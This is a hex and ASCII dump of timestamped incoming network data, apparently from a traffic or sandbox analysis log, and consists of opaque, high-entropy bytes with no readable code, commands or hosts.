                                                                                                                                                2022-09-29 12:51:50 UTC28243INData Raw: 7b 0a 19 0a cd 88 98 93 4c ce 3c 9f d7 2e 0f bb 5b d5 b6 0c e5 ad 45 a7 11 9f d7 c7 d7 cc 12 6c 9f 18 ba 9f 7c bd aa d3 a4 ed 93 9c 3f 53 69 64 4b 94 96 30 8a cd e4 0e 18 71 d7 cc 1d 8f cd b0 85 c9 0e ea d7 57 9d e0 5b da 96 77 f7 de 38 92 35 09 a0 0b df 53 f4 96 8d 98 69 ba 81 15 16 2b aa e1 cb 4d bd 84 a4 a1 95 a6 4a 2e 6b d9 93 5e dd 6e cf b4 5f ee 2e a9 f3 9a ff 1a 23 fc a4 bf 82 30 3e 3a 3e 00 d5 0a 39 18 9d e3 8f 1b 57 7c 17 2f 87 76 b9 04 58 07 8e eb cf bf 17 dc 60 59 01 cb 92 41 d6 be 6c 33 6c a0 88 0d d9 ae c2 29 dd 91 a1 7b 60 78 31 43 15 db ad 5b 04 07 91 64 7d 79 eb 9c bc 9f 00 7a 24 f9 fb a1 d8 19 8d 65 06 f1 bd 89 10 0c 75 4e 33 a0 31 cd 98 e5 61 11 70 6c d7 52 49 d3 2a b5 ab 81 ef 8e c7 0e 9b d0 38 51 f7 96 bb a0 04 a7 be d6 93 62 e0 88 84
                                                                                                                                                Data Ascii: {L<.[El|?SidK0qW[w85Si+MJ.k^n_.#0>:>9W|/vX`YAl3l){`x1C[d}yz$euN31aplRI*8Qb
                                                                                                                                                2022-09-29 12:51:50 UTC28259INData Raw: e1 c8 02 e1 81 20 d6 e9 a8 85 58 bf 44 17 ea c1 09 1b ea 95 ca e0 31 ea a8 e8 9a 8d 55 c4 c8 81 c8 8b a6 5f b1 08 e1 bb 8f c4 90 41 ba e2 77 f5 bf b2 74 bc ef ab 4b 46 62 a7 95 c2 15 d5 fe 25 53 8b 76 03 07 2d 38 47 11 8b 04 b1 be 43 e5 a6 4a dc ac c2 bd 65 d3 7b 84 24 e5 63 74 6a 36 5c 51 46 39 2e 85 0c 64 8e bd ca 6c 40 6b 2b 19 37 d0 71 4f 44 82 8b 48 92 1f a9 6a 3f 1a 58 16 03 72 c5 d3 85 3c d8 33 e2 a5 c0 1a 33 af f3 fa 0d b3 f5 ae 2b b6 aa f0 39 01 64 e3 dc 7b 4f 96 b4 ed 09 b3 73 60 42 5b 93 c1 a0 ff 3f 0a c4 96 49 ca c2 8a d3 e9 90 42 9b ef 9a 59 16 74 77 47 4e 80 29 f4 3c 0f 81 46 82 15 23 f9 fd d8 b3 e0 19 c0 ea 65 97 01 8b fb 5d fc 0f 4e 5d ec cd 71 2d 16 ce 1d a1 88 96 9d 10 c5 15 2d a4 8c cb f8 40 50 f1 9c 85 2d cb 43 34 97 69 3c c6 cc b6 3f
                                                                                                                                                Data Ascii: XD1U_AwtKFb%Sv-8GCJe{$ctj6\QF9.dl@k+7qODHj?Xr<33+9d{Os`B[?IBYtwGN)<F#e]N]q--@P-C4i<?
                                                                                                                                                2022-09-29 12:51:50 UTC28275INData Raw: 49 de d3 75 cb 61 d4 41 f9 b9 f0 f8 31 e6 a3 05 bb 25 cb a2 cd 4e 6a ff af 9d cb a9 9e c1 30 58 48 e7 29 c7 98 4f 25 3a 5f a1 37 cb 90 1f d8 c7 bc 60 70 b8 1f 3e ea cf 28 67 e4 4f 8a 52 c1 87 c5 39 77 b7 3a 45 f7 2f 29 6d 51 66 63 fd 41 ff dd 07 e9 85 21 86 cf 14 c6 1e 6c 88 91 c8 a7 21 5a 4c 91 70 e9 61 62 35 47 ec 95 ef bc 7d ab 50 a8 e6 be 1a f6 ac 77 d0 33 78 98 6e af be fe 3d 53 54 55 80 70 4a 9a ec ff d1 b5 a3 2e db 06 4b 44 18 b2 7f 48 af ae 46 f0 69 d1 f7 87 1d 6a a8 61 c2 dc 08 22 1d 1c 7d c1 42 6c 05 78 d0 b0 3e 3b 40 24 71 97 e6 e1 2e e8 eb 5e 53 23 09 4f aa eb be e1 24 04 99 29 87 ca 9f 5c f5 a7 e6 d0 0c 84 2a cf 94 e1 a8 8d 52 7d e6 d9 a5 86 82 bf cb b1 0b 8c 3f b1 41 c9 29 52 1f e2 e0 6b 1a bb 70 22 16 42 91 f1 45 36 c0 27 93 ac 1c 8c 8c c2
                                                                                                                                                Data Ascii: IuaA1%Nj0XH)O%:_7`p>(gOR9w:E/)mQfcA!l!ZLpab5G}Pw3xn=STUpJ.KDHFija"}Blx>;@$q.^S#O$)\*R}?A)Rkp"BE6'
                                                                                                                                                2022-09-29 12:51:50 UTC28291INData Raw: 49 b1 70 ed 27 3c 18 a9 71 d1 33 90 41 7e 64 e0 71 7e 6b 9a 65 d4 72 33 08 ed 29 f7 4e 03 4d 38 1f 43 d5 c9 e7 66 ce 02 bc 4b da 75 80 9a 65 44 ad 5c b2 f0 3d d2 4c 63 81 25 45 88 8f d7 ee 27 b4 98 cb 88 7c d6 30 ac f5 ef 29 32 8e 1a 47 45 5d a7 28 70 fd 4f f6 7a 97 fc bf 5c c9 f0 2b 83 18 a6 fc d3 5c 6f 0b 8a 75 d1 f1 fa 88 bb 75 f6 b7 96 d1 e1 87 1e 9e fa 21 6a 4e 9b 62 ac 7d df f4 51 6c 29 68 8e d0 50 07 52 a3 b3 0c af 94 69 4f 51 c2 ee 5f e5 fe b3 29 1f f5 ce 3a 42 37 96 2a d2 ce 92 a2 b8 87 a9 d7 2d 5a d1 9c 63 45 e5 1a 19 c4 7b 29 30 f3 4a a2 a1 0f 7f d8 ec 5f 4f 01 bb 15 1f be eb 1d 98 f1 b1 3d 5e 83 7c 19 ca c7 99 9c f2 0f 01 0a 49 11 35 8f dc 2d 4b 1b 42 5b 6d f4 9a 7f e7 91 11 b0 56 59 9c df 09 57 39 54 78 8f 57 58 87 33 df 69 d6 a6 6e 06 1f 05
                                                                                                                                                Data Ascii: Ip'<q3A~dq~ker3)NM8CfKueD\=Lc%E'|0)2GE](pOz\+\ouu!jNb}Ql)hPRiOQ_):B7*-ZcE{)0J_O=^|I5-KB[mVYW9TxWX3in
                                                                                                                                                2022-09-29 12:51:50 UTC28307INData Raw: 88 af 3b 81 cc 55 84 ad a6 98 cf 8b 78 08 db 3e 62 50 37 d8 6d 38 e6 4d 7f cc d9 19 aa 74 d0 b9 da 22 1a 6b 87 65 f9 de 6d d2 e8 28 73 16 28 f6 f6 8e 8f 50 da 90 18 19 f6 f8 49 25 4a a9 59 8e 91 0d 06 46 19 b2 0a e3 b4 80 08 67 8f 79 4e 24 81 77 c3 d5 2a b6 8e 0f 6b 2c 3a 0e bc 32 e1 de c2 86 e7 89 b3 c2 c0 6c c9 36 6e 19 af fa e4 e2 fe 39 06 f8 cb ac f4 e3 6b 91 ca 2a 8e e3 70 dd a7 03 af 12 3b 5f 13 05 58 c5 62 f2 58 81 49 66 56 88 b9 92 eb 04 8a 6e a9 3e 02 e6 5e e4 2f 4e 36 3a f8 ec 13 10 a2 4f dc db 67 33 fe 93 74 63 0e b3 b5 3c 8a de dd 95 95 19 cc 40 61 ee 02 86 ab 39 ea 2a 35 69 2f 53 17 49 49 61 19 8d 3b 9a 91 14 2b 48 be c0 e4 4d 18 9e a5 3f 5e bd b0 f7 ca 1f 4f ad c1 00 f9 b5 d2 b5 be 15 b7 21 a7 82 b6 5a 3d 11 ab 6f 51 46 2e 0a 87 5d 24 06 66
                                                                                                                                                Data Ascii: ;Ux>bP7m8Mt"kem(s(PI%JYFgyN$w*k,:2l6n9k*p;_XbXIfVn>^/N6:Og3tc<@a9*5i/SIIa;+HM?^O!Z=oQF.]$f
                                                                                                                                                2022-09-29 12:51:50 UTC28323INData Raw: a6 6e c8 2e 0f 04 09 eb 4b 00 58 60 d4 5e 99 bc 50 2e dd 77 f4 eb 78 bc 59 4e 52 7d aa a3 83 5e b0 08 b4 b9 6e aa 65 33 4a c3 eb eb 87 a7 86 64 c0 67 9f 59 c1 cc 08 1f ac 41 73 1c 69 33 83 cc 71 4c da c6 50 ac 23 8f 40 3e 9c 4e 58 39 e5 11 ac 29 ef 7f db de 34 cb 45 89 9f f0 53 04 a3 4e 96 77 19 bb ef 8d f5 f4 8c 02 cf b1 26 04 1e ee 16 79 bc 86 7e b6 50 a8 31 17 71 39 01 fe d0 ad 47 70 40 96 af d9 af 00 88 7d f4 60 0d 76 3c d9 26 ab f5 be 57 da 9a f5 f0 85 b2 06 94 d7 33 7a 5e 2e 97 1e c9 21 8d 7a bf ba c1 70 2d 76 32 44 b1 a8 45 51 c1 4b 36 67 33 ed 37 21 dd 7b 02 05 16 bc 37 8f 60 4e eb 08 cc fd 54 c2 39 a8 4b 68 2e ec fc 6a f4 f7 51 5b 3f 37 09 93 3a 26 04 11 f3 f7 2f 7b cf 28 45 40 2d c5 2e d4 b7 8c 30 24 fb a9 d8 93 36 98 1a b0 e8 b2 68 4b 9f f6 f7
                                                                                                                                                Data Ascii: n.KX`^P.wxYNR}^ne3JdgYAsi3qLP#@>NX9)4ESNw&y~P1q9Gp@}`v<&W3z^.!zp-v2DEQK6g37!{7`NT9Kh.jQ[?7:&/{(E@-.0$6hK
                                                                                                                                                2022-09-29 12:51:50 UTC28339INData Raw: 48 a2 3d a2 83 e9 de a0 55 9d 80 75 5b 28 45 b7 ef 8d b2 41 22 a7 b0 9c 4d 4e 6d 7d 1a a4 b1 d1 f1 05 bf 8d 8a 40 de 11 f6 54 bd 16 13 83 3c 06 d4 a4 12 41 7c 11 aa dc f2 d8 4c a2 4f 68 e5 04 81 cb 29 4a f3 f2 6b 6c 64 da e0 9c e1 df 50 92 eb f0 c0 5d bf 92 d3 4a 68 d9 71 d0 98 99 96 1e b7 bc 09 a5 1b ff d8 d8 84 c3 1f fc c0 7a 6b 2b b2 73 f6 ab f0 ac 45 fa 3a 06 e3 aa 50 19 03 e2 51 b8 f0 bc 6e 27 2c 31 63 85 58 d1 58 8e 84 6e 1b 86 37 e5 d4 cb e3 6a 4a 3c 54 6d 38 b4 6d 6f 2a 5a a5 b2 94 07 33 d9 66 6b ff 97 f5 d4 4d ba b7 18 1e bc 71 58 41 d9 72 7f 26 df bf b0 c1 7b 12 92 05 93 76 63 23 73 17 70 54 ba 97 eb 8f e4 0d e9 81 d9 23 3d 37 21 2f bd 13 ee 09 3d 46 8d c3 15 cb 38 c4 51 bf b2 67 97 b2 2b d0 4c 26 2d 5f 53 1b 8a ba 29 ed 05 4a 21 a9 71 f4 e0 3c
                                                                                                                                                Data Ascii: H=Uu[(EA"MNm}@T<A|LOh)JkldP]Jhqzk+sE:PQn',1cXXn7jJ<Tm8mo*Z3fkMqXAr&{vc#spT#=7!/=F8Qg+L&-_S)J!q<
                                                                                                                                                2022-09-29 12:51:50 UTC28355INData Raw: 21 40 57 37 ba d4 9b 96 45 2a 11 d5 1f 67 89 85 a1 85 18 38 46 fe f2 0f c8 42 bd 7d fd 80 d0 c6 24 ed 87 63 4e 02 21 db 41 36 15 29 83 e3 43 12 b1 29 8e 64 c9 05 f2 cc 48 8b ec eb 91 be 31 5b 4a a9 0d 85 ce 0b e8 8e 8b 97 9e f5 5b 95 2a 13 06 a5 8e 22 6f 55 4c 00 c2 63 14 f4 b5 b8 22 14 e5 49 4b f1 94 36 8d 32 20 26 69 14 d5 d2 fe 93 06 4a 80 94 a6 cd 58 db 20 96 6c 39 25 74 c2 bc eb 89 06 64 6f 7e 4b b2 fb 80 02 e3 74 cc 26 63 9a 1f 1a 17 01 70 c6 5c 30 ee b9 05 16 f9 26 b3 33 cf 95 75 a0 5a 03 67 22 c3 c4 4c 12 0d 44 88 2f 79 3d 1d 06 33 71 12 ac c6 b5 4e 75 2f b4 14 bf ae 93 f3 7d 8f 47 1d 4d 6c 7e 93 48 d3 26 11 86 13 f6 c7 7b 8e 87 36 db 4a 8b 09 7e 3b 43 7e 68 2d c3 2e 59 07 f9 e1 5c b1 1e 87 90 69 03 4a 90 b8 54 a8 ab 53 d5 93 1d b2 a3 e2 f8 11 0d
                                                                                                                                                Data Ascii: !@W7E*g8FB}$cN!A6)C)dH1[J[*"oULc"IK62 &iJX l9%tdo~Kt&cp\0&3uZg"LD/y=3qNu/}GMl~H&{6J~;C~h-.Y\iJTS
                                                                                                                                                2022-09-29 12:51:50 UTC28371INData Raw: fc 95 87 82 73 97 33 cb 4c 26 4e c3 81 83 44 01 75 15 28 35 30 5e 98 b3 92 a2 b7 0e 62 70 a3 31 f6 ec f7 a4 bb d9 3b a0 c6 2c 8b a3 74 5e 28 48 3d b7 9e d1 87 e2 ea 84 0d c0 3e 25 bb 49 a3 8a 1c a5 f0 95 e7 76 ca d6 81 ab f2 72 60 ff fa b6 fc 8d 39 b6 36 59 d3 64 ab 27 af 70 29 ca b9 c7 16 4e 45 34 da 8e 29 d8 43 54 1a 14 63 5a b8 98 04 e7 c4 d7 00 ab a9 9d 32 3e ac 7a 14 c5 d1 02 bf eb c3 98 d6 03 70 a8 54 e6 e5 d4 41 2b 45 07 73 6c b0 da 89 7e fd 7c 67 b6 64 53 38 8f 16 96 90 91 e0 e6 13 63 30 6f a7 c2 36 5f dd c5 1c ca d9 2f e4 29 f9 a4 1c 7d 19 37 81 f3 3b 18 35 f7 ac c1 3e 4b 6a e5 0f a6 9e 4c 28 37 2d 6b 38 89 3f 2a 9b 7d 87 4a 70 85 c2 73 1f c6 f0 84 63 a5 cb 59 0e 09 ff 0b cc f1 42 86 f4 88 b3 65 ad 8a b7 f8 4b 50 e2 03 5f 19 9b 2b e8 56 1f 84 75
                                                                                                                                                Data Ascii: s3L&NDu(50^bp1;,t^(H=>%Ivr`96Yd'p)NE4)CTcZ2>zpTA+Esl~|gdS8c0o6_/)}7;5>KjL(7-k8?*}JpscYBeKP_+Vu
                                                                                                                                                2022-09-29 12:51:50 UTC28387INData Raw: 34 1e af 5c 07 e0 d9 1d 14 e3 c8 2a e7 70 5b fc 6e a9 a1 57 6f a7 4c e7 f3 9b ac 5b ec b3 47 66 ea 48 a8 5f d0 7b 29 0e 4a 2e 44 eb e2 c7 63 22 32 6d 8c 8a 30 a8 bf 9e d9 ba d9 dc 2c d9 81 75 de 2a 86 07 8d 73 62 b1 2b a2 87 7b 6e 8f 8f ab 3c b6 21 cb 00 a8 30 1c 8e b0 3b 60 27 4c 3d ff 2c c2 5a 97 8e f0 52 af c8 5d dc 31 5b 5a 6b a7 23 eb f9 63 55 67 de bb b8 b3 01 e6 e5 fd 50 8f 4c 8c fa f9 ac 90 0f a2 c2 88 36 32 16 6b 8e 46 dd 18 dd 9c b2 8b 81 11 df a9 d0 6e 99 15 2a 3e ce e6 55 bf e9 1e b7 13 2e de 0e 8a e7 8a 7d 20 09 65 90 3a a1 8e 24 60 a5 6f 03 2f cb 50 f5 ed 1c 54 96 d6 db 5d 00 98 2b 35 4f 28 06 1a e6 bc b9 43 d2 aa c0 4b fe 49 13 59 aa 3f ad a8 fe 75 56 50 51 fd 72 2c 63 3a 0c 69 a9 50 4e 73 c3 0f 20 0b 8b 95 97 8e 1c 0c a5 59 e7 76 00 0a 50
                                                                                                                                                Data Ascii: 4\*p[nWoL[GfH_{)J.Dc"2m0,u*sb+{n<!0;`'L=,ZR]1[Zk#cUgPL62kFn*>U.} e:$`o/PT]+5O(CKIY?uVPQr,c:iPNs YvP
                                                                                                                                                2022-09-29 12:51:50 UTC28403INData Raw: 7e dc 41 46 42 57 5b 68 58 ee 91 b1 3b 0e 96 a8 79 44 67 2e cf e5 66 be 6c d5 75 6e cb d6 5d 65 d8 4f 9f 20 b9 6a 08 c6 44 fe 73 d5 72 8b c4 f2 3e aa fa 59 68 7d ba 0b 04 f5 96 31 85 c2 0c 09 3e 14 d4 e8 c0 40 51 b5 84 a9 e3 28 4e 14 d2 d4 93 40 0b 53 77 62 6c e8 d3 38 19 f7 db 70 04 bb d8 24 a3 9c 97 7a 45 b2 83 f3 d4 49 64 24 7c 6f 6c 84 f6 01 49 84 f2 d8 6d be eb 9a cf a2 e6 b2 97 ad 33 a2 cf fb 23 5d 10 5f c5 e2 fa 51 c2 ff 2b 63 b7 40 f3 42 c7 77 fa a8 9e 01 46 50 e4 02 c6 0d 60 0f aa 36 e2 ee 18 89 24 a2 22 58 27 1c 33 a0 c8 98 7c 8a 67 11 31 c5 94 ef 37 8b 6e a8 58 62 f4 d6 cb 4b 2b 6b 49 75 b6 5d a4 77 b7 36 b7 1d 38 d4 ac 11 c8 e6 f0 26 e3 5e 5a 2b 6a a6 d2 99 c7 e2 f8 a9 62 3a d9 07 0a 5e fb 10 53 6a 67 e0 6d a1 08 97 d0 f5 1e 74 39 f4 55 23 0f
                                                                                                                                                Data Ascii: ~AFBW[hX;yDg.flun]eO jDsr>Yh}1>@Q(N@Swbl8p$zEId$|olIm3#]_Q+c@BwFP`6$"X'3|g17nXbK+kIu]w68&^Z+jb:^Sjgmt9U#
                                                                                                                                                2022-09-29 12:51:50 UTC28419INData Raw: cc 97 3f a2 31 ca cd e8 9e a0 36 86 7f e6 19 3d e9 b8 c8 a7 37 e0 34 c6 bc 94 10 d7 ee 70 38 98 c9 3b 85 6d 63 f3 b0 29 08 81 0a f7 eb ba 88 b0 da a9 7e 14 ef 44 70 c8 c2 e4 8e bb 5c 01 7e 75 a3 15 10 59 e6 0f b9 25 f9 41 c6 fc 15 89 43 5b 0c b4 e6 0b 34 f5 81 8c 90 b6 66 f2 e7 c4 ff 95 7a 08 0a a4 b5 cd 03 96 b5 92 68 bd 2a f9 da 21 80 2a cc f1 ae f0 29 12 38 e7 70 24 04 fb aa d2 f7 fe 10 c6 ea 4b 74 9b 98 a8 19 fc ae de 1f 29 85 a2 2e e5 88 97 03 f5 24 89 bc 5a bc 38 1a f4 48 de f2 7d ce 2e b1 e8 70 79 04 60 11 0b d4 a3 02 7b 35 45 59 a9 82 59 e7 f1 6b e5 fd e2 06 14 81 1a 82 4f 0d 31 10 58 0c d0 90 71 f2 f5 78 02 f2 37 47 d3 8f 32 8d 4b e3 fe a8 e4 64 46 ea 76 8f ad c0 9d 45 10 7a 38 a0 91 52 d3 14 34 14 e3 a4 59 94 c4 de f8 03 74 92 e5 db e3 66 ea 10
                                                                                                                                                Data Ascii: ?16=74p8;mc)~Dp\~uY%AC[4fzh*!*)8p$Kt).$Z8H}.py`{5EYYkO1Xqx7G2KdFvEz8R4Ytf
                                                                                                                                                2022-09-29 12:51:50 UTC28435INData Raw: 1c 67 89 3d 37 b4 e8 73 33 8e 0d 4b c2 7c 39 d1 fd 44 70 28 92 f6 d9 cb 13 64 c4 24 1d 9f 6b fd a0 06 f1 6c 06 81 44 ec ba a3 3e 54 c8 da f4 4f 0f 14 4e e7 9e 7a 50 c1 e1 33 04 14 57 72 56 89 77 cd 00 6c d1 2a 55 56 49 cf 3a a4 36 03 9b a1 1d 6f f6 a8 97 2e 46 52 49 4c 7f 36 ff eb 9f 11 b8 d1 3f 0d 21 53 a5 7e 68 21 fe 4e 12 7f 44 c0 82 e5 f3 3d 7f ab fa b8 86 67 a0 22 4f 43 b1 ee 00 7e 0e 09 55 c3 07 1a d2 6a 9e 6d 2d 88 46 91 bd 11 09 c1 e6 6e 80 68 ba 10 f7 98 0a fb 8c a0 71 4e 3f 47 8c 69 e2 5e cb 51 a0 5e 98 cb 29 1e 37 bc ab c9 83 5c 9c 51 9b 14 60 ee dd 6f 41 0f 88 d3 01 b8 15 0d bf 55 7f 38 8f 29 c7 99 1e ee 50 c0 0c f2 78 60 79 78 4f 5c 24 a4 18 30 42 5e 5f 2e 9b e9 90 ee cf bc 21 6d de 2b 6e cc 3c f7 1a c6 94 80 9c 9f fe 42 6e 5e 1b 6e f7 72 26
                                                                                                                                                Data Ascii: g=7s3K|9Dp(d$klD>TONzP3WrVwl*UVI:6o.FRIL6?!S~h!ND=g"OC~Ujm-FnhqN?Gi^Q^)7\Q`oAU8)Px`yxO\$0B^_.!m+n<Bn^nr&
                                                                                                                                                2022-09-29 12:51:50 UTC28451INData Raw: 77 31 90 b3 5c dd 20 31 ef f6 91 1d 85 0c fe f0 a6 43 2b 64 bf d4 4c d8 70 23 85 89 e5 99 fd d1 cf a1 09 f6 1e ba 35 c4 7b 32 a9 14 85 ee 2f ba f8 53 82 2c 9a 7b 7e 6a a5 54 6e 10 75 1a 83 ce f2 bd d3 36 26 89 c6 75 97 ad 24 c2 94 65 bc 39 5f dd 44 de 11 b7 45 ba 42 78 80 1f 6e a5 8f a2 e3 56 fb d9 a8 91 fe 21 06 60 49 c0 5f 9a 37 d7 41 af 2a 59 7f 63 e4 40 7e 05 33 c4 f3 75 1e 4b 06 fc 63 d5 d3 70 97 30 d1 2b b2 6d f6 80 7c 83 80 35 5b 3b 9f 78 a0 63 c5 15 01 fd fb 15 be d4 1f 68 3d 34 1b 0f 5a 96 fb 85 5f cc 10 c8 08 87 4c aa 50 be 3c ef 8c 44 ba 8f e8 0c 24 d6 20 90 a7 03 5c d8 83 aa 2b 91 bc bd fc e5 ca 78 3c 4b b4 13 4e b9 4d f7 55 f0 db 00 54 c1 80 1c 75 89 f2 e3 47 2e ff 6f 02 fe 41 49 7c c4 3d 2c cf e6 97 55 0b 3e 66 24 1e f7 b1 6e e3 a5 fd a2 2a
                                                                                                                                                Data Ascii: w1\ 1C+dLp#5{2/S,{~jTnu6&u$e9_DEBxnV!`I_7A*Yc@~3uKcp0+m|5[;xch=4Z_LP<D$ \+x<KNMUTuG.oAI|=,U>f$n*
                                                                                                                                                2022-09-29 12:51:50 UTC28467INData Raw: bd 3b f2 47 30 66 02 6c 15 31 03 ad c7 13 42 1d 5b 95 f8 df 39 7c 9a 86 bf 31 1f 8a 78 08 39 3e 10 70 52 be 45 af e0 22 a9 3b cf d6 f8 58 52 8b 81 90 24 6a e5 f7 4b b5 23 81 3e 94 88 35 e0 07 95 6c 5a c3 01 18 a8 04 d1 c9 be 23 fb 08 d1 f5 ad e8 f2 bb f0 7b f3 5f 67 0c fd 8c 54 75 ba 96 c7 45 c6 f2 de 1c 50 95 e3 c5 19 0f 5d fa 4b 6e 60 9a 78 6c b2 b2 e3 85 8e c9 19 78 2b 03 b9 05 3e 14 79 f5 ef e4 a3 b3 dc 54 76 15 3e 94 a7 ba 32 6b 02 8e 18 75 c3 14 49 8d 1a b3 6a cb 27 c7 f0 f2 a6 5e e7 24 39 0a c6 c6 f8 b0 4f 92 9c b7 7a 86 e2 09 e5 7b af 00 dc 85 04 20 db 8c 4c e0 88 84 ab 2c db 6a ba 26 9e 59 f1 bb fc bd f0 29 fc 07 f1 ed d0 42 34 74 82 ec ef a7 1f 12 3c 75 bf 5d 43 d4 14 cf 93 54 37 05 ec f0 ea 49 29 87 f1 25 4a cb ac 44 4c 77 91 38 ff 71 1e dc 86
                                                                                                                                                Data Ascii: ;G0fl1B[9|1x9>pRE";XR$jK#>5lZ#{_gTuEP]Kn`xlx+>yTv>2kuIj'^$9Oz{ L,j&Y)B4t<u]CT7I)%JDLw8q
                                                                                                                                                2022-09-29 12:51:50 UTC28483INData Raw: e7 f8 aa 47 ab af 42 5a c6 9c ec 67 91 be 98 04 67 20 77 c1 6c f4 27 31 4e f5 15 6b 2d c7 fb ce 4a 56 aa 8a 6b 08 8b 93 ad c2 fd a2 6c 1d cd a1 77 f5 03 6c af 61 43 ab db 2b 3a 7c 0d 8f 67 3a 67 3d 28 02 60 81 a2 e8 6c 29 c2 6d 88 bf ff 78 9a ec 4a a8 8e 4c 6f c4 31 13 f6 d4 f1 24 4c 03 d0 eb d4 33 3d e6 60 ec 79 1a 2a 5c 2b 5a 37 32 76 25 31 bd 15 f0 00 83 21 32 ef 25 00 7f 6d 40 23 61 07 67 30 ec 1c 52 58 d6 78 3b 0c b6 92 74 0e 94 85 4e 56 4f f9 ef ee 7d 47 d5 e8 db c1 79 18 a9 29 36 ad 78 74 6e 5f e0 4d 3d a1 00 d1 67 3b be e4 fa a7 9d d1 bd e0 30 90 58 2a 21 e3 ff d9 3e 8b 3f fa c6 c4 0e a3 1a b5 1d a9 68 3d b2 3b c4 f4 d1 0a 0e 60 95 3c fa 7c b7 9f c4 1c 25 5c d4 ee 6b e3 0f be 53 58 7e 1f 9a cb 84 1c 6d ec e1 22 54 c4 82 f4 0a d9 a8 1b e1 ec 23 3d
                                                                                                                                                Data Ascii: GBZgg wl'1Nk-JVklwlaC+:|g:g=(`l)mxJLo1$L3=`y*\+Z72v%1!2%m@#ag0RXx;tNVO}Gy)6xtn_M=g;0X*!>?h=;`<|%\kSX~m"T#=
                                                                                                                                                2022-09-29 12:51:50 UTC28499INData Raw: d8 5d d6 3f 89 9a bc fd 90 53 52 31 da 36 4a f2 93 6e 35 22 5d 76 66 60 e9 84 6a 73 f5 76 04 df 34 87 a5 97 29 d8 1d 55 00 9c e6 a3 0b 21 de 03 14 92 c6 5a c0 7e e3 c5 c5 38 1f 9a 93 64 8f 26 35 49 6c 36 ae fb 44 2d 28 c1 3b 6e 79 cc 82 1b f8 c5 d0 0a f5 d0 a8 01 d2 70 67 07 22 3f 78 6f d8 14 30 da 64 4a 3f 3c be 75 4f 79 a0 36 a1 f9 56 03 fe f2 c2 d5 6e a8 d9 f2 bf 7b c4 2a 10 1c 15 39 50 29 73 45 b1 1d 34 b6 94 cd dc 63 72 d8 b5 bc 36 7a 37 9c 1a 5a 99 c1 59 fd 50 f2 65 01 5b d3 dd 17 09 a9 e6 26 8b af 65 5a c4 63 a0 96 73 5d 6f 53 7a c0 7e 18 4d fe 83 9f c2 89 d9 d3 42 97 73 73 c2 a8 d9 82 a5 15 46 d3 af 9f b9 16 92 b7 b3 4a 21 32 f0 22 87 bb 99 bc 65 d5 34 df 9d 51 89 78 d0 ee 98 6b 94 33 d1 08 c9 16 fc ea 40 ff dd 45 9f ac d7 d8 c7 69 b7 45 23 80 fe
                                                                                                                                                Data Ascii: ]?SR16Jn5"]vf`jsv4)U!Z~8d&5Il6D-(;nypg"?xo0dJ?<uOy6Vn{*9P)sE4cr6z7ZYPe[&eZcs]oSz~MBssFJ!2"e4Qxk3@EiE#
                                                                                                                                                2022-09-29 12:51:50 UTC28515INData Raw: 22 c9 04 7a 60 eb 69 7d 9b 53 ab e4 c3 cb 72 43 81 e4 f4 70 a8 c0 2d 3b 82 d7 f0 0c 25 6b 32 f5 52 f1 1a 47 dd 27 76 45 2d 8f 5b a9 cf 54 e6 07 eb 54 19 b9 e6 4a b0 7c 98 64 54 7a 07 b5 c7 f9 87 94 14 93 de f7 13 93 70 0d a3 e0 85 b0 98 c4 18 f8 0b ea ed 6e 26 51 12 b0 cb 6b 0f 85 48 33 8e a8 79 6b ee ac 37 91 d9 46 0f 85 c1 ce 54 95 9e c3 2d 6b 14 5b 6c ca ab 48 e3 ba d2 39 88 37 d0 9d d0 e5 84 c2 d1 ee 97 b4 92 3c f3 1f 8b 9c 17 ff 11 a8 b8 ed d7 b6 93 60 68 42 9d 26 89 97 e5 f5 67 6a 61 15 f2 9f cd b6 88 31 3a 9c f1 a2 81 e8 b8 81 46 80 22 b9 65 47 02 3e d5 fe 6e 23 22 ad f8 21 3c 29 45 57 2d c3 70 74 09 f0 3b ef 70 1d c7 b4 45 73 cb 85 71 21 2e bd 03 76 a4 8a aa d4 5c 57 d3 ae e5 1f 1d d5 33 cb fe bd 39 ad 6a 40 5c 72 6e 2f 8e 3f d2 55 37 35 5a 2e cc
                                                                                                                                                Data Ascii: "z`i}SrCp-;%k2RG'vE-[TTJ|dTzpn&QkH3yk7FT-k[lH97<`hB&gja1:F"eG>n#"!<)EW-pt;pEsq!.v\W39j@\rn/?U75Z.
                                                                                                                                                2022-09-29 12:51:50 UTC28531INData Raw: f8 24 21 a0 30 60 ae 67 82 8c ea 2d 0e 86 f0 0e 8c 1d a6 73 2a ec 5b 63 41 90 49 22 b1 be cf 6b 26 38 06 20 3d d8 c6 fc e5 98 3e 0b 26 e2 87 0b 1f bf 87 33 fe e7 b7 eb f1 b7 8c cc 40 72 74 0d df 1f f6 c5 0d 4d 9d f0 f5 af fe 43 a7 5d a3 28 4d e8 65 8f 94 f0 4e ef 91 20 45 6b 36 b1 d4 2f c2 55 36 e7 58 41 0c d6 39 17 e7 ea 78 23 88 24 7c 54 67 c5 5a aa 14 f6 21 0f dc d2 b4 2a 21 ce 80 b0 92 16 23 4c 6e c5 33 99 03 2f e3 61 9d 95 32 36 b7 cf 46 a8 a3 7f 22 76 e2 16 35 85 a1 be 88 70 93 e6 09 6a 9d 2b 42 74 14 4c db 78 ed f1 29 80 08 c8 b8 11 0f d6 6f 21 22 77 2b 42 e8 a5 af 54 fd 76 d8 f3 a2 ea 36 42 b9 f7 62 7f 7b e6 65 79 2a 86 45 ce 61 c3 37 1f 55 4b 9e 9e af 22 09 27 19 b0 b5 a8 50 57 93 97 ff 85 60 4a 3f 48 11 20 0f a5 6f 0c e0 2b 57 1f df 67 38 53 cc
                                                                                                                                                Data Ascii: $!0`g-s*[cAI"k&8 =>&3@rtMC](MeN Ek6/U6XA9x#$|TgZ!*!#Ln3/a26F"v5pj+BtLx)o!"w+BTv6Bb{ey*Ea7UK"'PW`J?H o+Wg8S
